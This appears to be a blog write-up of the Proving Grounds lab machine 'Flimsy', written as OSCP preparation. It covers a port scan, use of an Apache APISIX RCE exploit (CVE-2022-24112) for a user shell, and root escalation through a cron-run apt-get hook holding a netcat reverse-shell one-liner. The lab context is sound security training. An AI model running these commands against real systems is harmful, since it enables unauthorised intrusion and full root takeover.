Proving grounds:Flimsy

Al1z4deh:~# echo "Welcome"
2 min readFeb 17, 2023

--

Today we will take a look at Proving grounds: Flimsy. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network
PORT      STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62361a5cd3e37be170f8a3b31c4c2438 (RSA)
| 256 ee25fc236605c0c1ec47c6bb00c74f53 (ECDSA)
|_ 256 835c51ac32e53a217cf6c2cd936858d8 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Upright
|_http-server-header: nginx/1.18.0 (Ubuntu)
3306/tcp open mysql MySQL (unauthorized)
43500/tcp open http OpenResty web app server
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • OpenResty (43500)

JSON error message

Check the Apache version.

┌──(kali㉿kali)-[~/oscp/lab]
└─$ curl http://192.168.114.220:43500/ -I
HTTP/1.1 404 Not Found
Date: Fri, 17 Feb 2023 09:34:34 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Server: APISIX/2.8

we found that there is an apisix exploit

─$ searchsploit APISIX    
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache APISIX 2.12.1 - Remote Code Execution (RCE) | multiple/remote/50829.py
--------------------------------------------------------------------------------------------------------------------------- --------------------------------

Use exploitation

└─$ searchsploit -m multiple/remote/50829.py         
Exploit: Apache APISIX 2.12.1 - Remote Code Execution (RCE)
URL: https://www.exploit-db.com/exploits/50829
Path: /usr/share/exploitdb/exploits/multiple/remote/50829.py
Codes: CVE-2022-24112
Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/oscp/lab/50829.py
  • franklin

└─$ python 50829.py http://192.168.114.220:43500/ 192.168.49.114 444

. ,
_.._ * __*\./ ___ _ \./._ | _ *-+-
(_][_)|_) |/'\ (/,/'\[_)|(_)| |
| |

(CVE-2022-24112)
{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }

We got a shell from the user

franklin@flimsy:/root$ ls
ls
ls: cannot open directory '.': Permission denied
  • Privesc (apt-get update)

Since the service is running as root, we can execute malicious commands through the apt package manager.

franklin@flimsy:/root$ cat /etc/crontab

#
* * * * * root apt-get update

Now we include the bash reverse shell payload in apt.conf.d:

franklin@flimsy:/root$ cd /etc/apt/apt.conf.d/   
cd /etc/apt/apt.conf.d/

franklin@flimsy:/etc/apt/apt.conf.d$ echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.114 1234 >/tmp/f"};' > shell

Listen:

listening on [any] 1234 ...
connect to [192.168.49.114] from (UNKNOWN) [192.168.114.220] 37266
/bin/sh: 0: can't access tty; job control turned off
# script /dev/null -c bash
Script started, file is /dev/null
root@flimsy:/tmp# whoami
whoami
root
root@flimsy:/tmp# whoami && uname -a
whoami && uname -a
root
Linux flimsy 5.4.0-122-generic #138-Ubuntu SMP Wed Jun 22 15:00:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@flimsy:/tmp#

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

Al1z4deh:~# echo "Welcome"
Al1z4deh:~# echo "Welcome"

No responses yet